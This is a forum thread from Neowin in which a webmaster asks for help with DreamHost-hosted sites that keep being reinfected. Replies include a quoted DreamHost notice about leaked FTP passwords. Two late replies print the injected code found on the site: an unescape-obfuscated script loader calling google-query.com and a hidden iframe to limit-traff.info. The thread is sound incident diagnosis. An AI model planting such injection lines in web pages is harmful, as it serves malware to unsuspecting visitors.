• Sign in to Neowin Faster!

    Create an account on Neowin to contribute and support the site.

  • 0
Sign in to follow this  

DreamHost Site Hacked

Question

Echilon    1

Some of my sites were recently listed by Google as having malicious content, I re-uploaded the files from my PC and all seemed fine, but a few days ago I got another message that three different sites had been listed. Sure enough, when I visited http://forums.lime49.com, I was prompted to download an ActiveX control which I have no knowledge of. The sites are hosted on DreamHost, and clearing the cache on the forums seems to work, but a day or so later it's become re-infected.

The forum runs PHPBB 3.0.5 linked to MediaWiki. I also run MovableType 4.23 and WordPress 2.85 on two different domains. I rely on these sites for my livelihood and am desparate to sort this problem out.

The generic tips (delete suspicious files etc) are quite hard to apply as I have about 10 domains on DreamHost with hundreds of directories. I don't know where to start.

Share this post


Link to post
Share on other sites

14 answers to this question

Recommended Posts

  • 0
booboo    6

I had the same problem. All my index.php files got infected. Injected with an iframe to load a malicous site.

Share this post


Link to post
Share on other sites
  • 0
booboo    6

It happen's randomly. I had pages not even on the web affected. Very very wierd.

Share this post


Link to post
Share on other sites
  • 0
Teddy*    0

Lol .....That is why i love firefox

post-317224-1257506510_thumb.png

Edited by Teddy*

Share this post


Link to post
Share on other sites
  • 0
booboo    6

Same goes for chrome as well. Same kind of error in chrome. I have turned them both off.

Same goes for chrome as well. Same kind of error in chrome. I have turned them both off.

Share this post


Link to post
Share on other sites
  • 0
booboo    6

Seeing as I can't edit. Here is some more information about why you may of got hacked:

http://www.caydel.com/dreamhost-leaks-3500-ftp-passwords/

Kinda **** huh

From: DreamHost Security Team

Subject: URGENT: FTP Account Security Concerns?

Hello -

This email is regarding a potential security concern related to your

?XXXX? FTP account.

We have detected what appears to be the exploit of a number of

accounts belonging to DreamHost customers, and it appears that your

account was one of those affected.

We?re still working to determine how this occurred, but it appears

that a 3rd party found a way to obtain the password information

associated with approximately 3,500 separate FTP accounts and has

used that information to append data to the index files of customer

sites using automated scripts (primarily for search engine

optimization purposes).

Our records indicate that only roughly 20% of the accounts accessed -

less than 0.15% of the total accounts that we host - actually had

any changes made to them. Most accounts were untouched.

We ask that you do the following as soon as possible:

1. Immediately change your FTP password, as well as that of any other

accounts that may share the same password. We recommend the use of

passwords containing 8 or more random letters and numbers. You may

change your FTP password from the web panel (?Users? section, ?Manage

Users? sub-section).

2. Review your hosted accounts/sites and ensure that nothing has been

uploaded or changed that you did not do yourself. Many of the

unauthorized logins did not result in changes at all (the intruder

logged in, obtained a directory listing and quickly logged back out)

but to be sure you should carefully review the full contents of your

account.

Again, only about 20% of the exploited accounts showed any

modifications, and of those the only known changes have been to site

index documents (ie. ?index.php?, ?index.html?, etc - though we

recommend looking for other changes as well).

It appears that the same intruder also attempted to gain direct

access to our internal customer information database, but this was

thwarted by protections we have in place to prevent such access.

Similarly, we have seen no indication that the intruder accessed

other customer account services such as email or MySQL databases.

In the last 24 hours we have made numerous significant behind-the-

scenes changes to improve internal security, including the discovery

and patching to prevent a handful of possible exploits.

We will, of course, continue to investigate the source of this

particular security breach and keep customers apprised of what we

find. Once we learn more, we will be sure to post updates as they

become available to our status weblog:

Share this post


Link to post
Share on other sites
  • 0
Echilon    1

I've changed all my passwords for what it's worth, but it's just annoying as Google have to go to re-check the site which takes days.

Share this post


Link to post
Share on other sites
  • 0
booboo    6

No it doesn't. As long as you use the webmaster tools for your domain it will take 24-48 hours. My site was back up in less than 24 hours :)

Share this post


Link to post
Share on other sites
  • 0
Echilon    1

The warning says http://forums.lime49.com is serving content from google-query.com, but I can't find any reference to it. A search for google-query.com site:lime49.com returns no hits either. How would I find where this is coming from?

Share this post


Link to post
Share on other sites
  • 0
Subject Delta    108

Can't you study your traffic logs in cPanel?

Share this post


Link to post
Share on other sites
  • 0
Guest   
The warning says http://forums.lime49.com is serving content from google-query.com, but I can't find any reference to it. A search for google-query.com site:lime49.com returns no hits either. How would I find where this is coming from?

Found it in the following file on your server:

http://forums.lime49.com/styles/brushed_me...ate/forum_fn.js

document.write(unescape("%3Cscript src='http://www.google-query.com/ga.php' type='text/javascript'%3E%3C/script%3E"));

Edited by Guest

Share this post


Link to post
Share on other sites
  • 0
svnO.o    27
I had the same problem. All my index.php files got infected. Injected with an iframe to load a malicous site.

Same with one of my friend's sites which is hosted as a sub-domain under my site. Might be trojan/virus/malware related (recently read about a trojan that will steal FTP passwords and infect website files). My sites haven't been infected though and I use Dreamhost.

Share this post


Link to post
Share on other sites
  • 0
Ranta    0

Looking at http://forums.lime49.com/ I found...

<script src="http://www.google-query.com/ga.php" type=text/javascript></SCRIPT>
</HEAD>
<BODY class="section-index ltr" id=phpbb><IFRAME style="DISPLAY: none" src="http://limit-traff.info/intraf.php?kod=954815&site=www.entervoid.com"></IFRAME>

Share this post


Link to post
Share on other sites
  • 0
Matthew S.    1,025

this is troublesome... I'm with dreamhost too -.-

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.